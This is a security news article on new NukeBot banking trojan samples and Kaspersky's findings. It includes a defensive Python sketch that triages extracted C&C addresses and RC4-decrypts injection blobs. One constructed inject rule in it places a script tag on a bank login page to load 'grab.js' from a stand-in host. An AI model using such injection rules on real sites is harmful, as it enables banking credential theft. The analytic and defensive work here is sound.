New “operational” samples of the NukeBot banking trojan have emerged months after its original creator published its source code.
NukeBot’s source code leak, which occurred in late March 2017, apparently attracted the attention of malware developers seeking to push out their own threats.
Kaspersky Lab’s Sergey Yunakovsky spotted some of those new samples in the wild. A few are “active,” but most exist only in a limited, non-operational form. As Yunakovsky explains:
“We managed to get our hands on a number of compiled samples of the Trojan. Most of them were of no interest, as they stated local subnet addresses or localhost/127.0.0.1 as the C&C address. Far fewer samples had ‘genuine’ addresses and were ‘operational’. The main functionality of this banking Trojan is to make web injections into specific pages to steal user data, but even from operational servers we only received ‘test’ injections that were included in the source code as examples.”
Most of the versions detected by Yunakovsky and his colleagues carry their configuration either as plaintext or as encrypted strings. From that data, Kaspersky Lab extracted NukeBot’s command and control (C&C) addresses. Once the trojan has successfully checked in, the C&C server sends it an RC4 key for decrypting the web injections.
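The triage described in the quote above and the decryption step just mentioned can both be sketched in a few lines. The block below is an added example written for this article; it is neither Kaspersky’s tooling nor NukeBot’s code. The extracted C&C strings, the session key and the injection rule format are all constructed for the demonstration (the page does not describe NukeBot’s real rule format, and the “routable” addresses are RFC 5737 documentation addresses and an example.net name standing in for genuine ones). It sorts C&C addresses into the two buckets Yunakovsky describes (localhost or non-routable versus “genuine”), then shows the RC4 round trip a server-supplied key enables and pulls the targeted hostnames out of the decrypted rules.

```python
import ipaddress
from urllib.parse import urlparse

# Networks a victim's machine cannot reach across the internet. A build whose
# C&C lives here is a developer/test build, not an operational one. We use an
# explicit list rather than ipaddress.is_private because is_private also flags
# the RFC 5737 documentation range that stands in for routable addresses below.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "169.254.0.0/16",
)]

def classify_c2(c2):
    """Return 'test' for localhost / non-routable C&C targets, 'operational' otherwise."""
    if "://" not in c2:
        c2 = "http://" + c2            # accept bare host strings as well as URLs
    host = urlparse(c2).hostname
    if not host or host.lower() == "localhost":
        return "test"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "operational"           # a DNS name: assume it resolves somewhere public
    return "test" if any(ip in net for net in NON_ROUTABLE) else "operational"

def triage(c2_list):
    """Split extracted C&C strings into the two buckets the Kaspersky write-up describes."""
    buckets = {"test": [], "operational": []}
    for c2 in c2_list:
        buckets[classify_c2(c2)].append(c2)
    return buckets

def rc4(key, data):
    """Plain RC4 (KSA + PRGA). RC4 is symmetric, so one routine encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):               # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                  # pseudo-random generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def decrypt_injects(key, blob):
    """Decrypt the injection blob with the RC4 key the C&C handed out after check-in."""
    return rc4(key, blob).decode("utf-8", errors="replace")

def inject_targets(rules_text):
    """Hostnames the decrypted rules target; these show who a build is going after."""
    return [urlparse(line.split(":", 1)[1].strip()).hostname
            for line in rules_text.splitlines() if line.startswith("target:")]

# Constructed sample: C&C strings as pulled from several builds' config strings.
# Loopback and RFC 1918 entries are 'test'; the documentation-range address and
# the example.net name stand in for genuine, routable C&Cs (hypothetical values).
EXTRACTED_C2 = [
    "http://127.0.0.1/panel/gate.php",
    "http://192.168.1.20:8080/gate.php",
    "http://10.0.0.5/gate.php",
    "localhost",
    "http://203.0.113.45/gate.php",
    "http://c2.example.net/gate.php",
]

# Constructed sample: a session key and an injection rule set in a made-up
# format, encrypted the way a server would return them after check-in.
SESSION_KEY = b"example-session-key"
INJECT_RULES = (
    "target: https://bank.example/login\n"
    "inject-before: </head>\n"
    "payload: <script src='https://203.0.113.7/grab.js'></script>\n"
)
ENCRYPTED_INJECTS = rc4(SESSION_KEY, INJECT_RULES.encode())

if __name__ == "__main__":
    for bucket, entries in triage(EXTRACTED_C2).items():
        print(bucket, entries)
    rules = decrypt_injects(SESSION_KEY, ENCRYPTED_INJECTS)
    print("targets:", inject_targets(rules))
```

The first pass is what lets an analyst discard the bulk of leaked-source builds quickly; the second is what you run against a blob captured from a server that did answer, to see whether the injections are the stock examples or something aimed at real banks.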
The web injections conducted by some of NukeBot’s “combat versions” reveal that the malware is mainly going after French and U.S. users’ banking credentials.
Fortunately, at most five percent of the samples detected by Kaspersky were combat-ready. That doesn’t mean there won’t be more in the future, though. As Yunakovsky rightly notes:
“It is still unclear if these versions were created by a few motivated cybercriminals and the use of NukeBot will taper off soon, or if the source code has fallen into the hands of an organized group (or groups) and the number of combat-grade samples is set to grow.”
To guard their banking credentials against threats like NukeBot, users should run an up-to-date anti-virus solution on their computers and exercise caution around suspicious links and email attachments.
You should also enable two-factor authentication (2FA) if your bank offers it. Some trojans can bypass this protection, but doing so considerably raises the cost and complexity of an attack, beyond the interest or capabilities of ordinary computer criminals.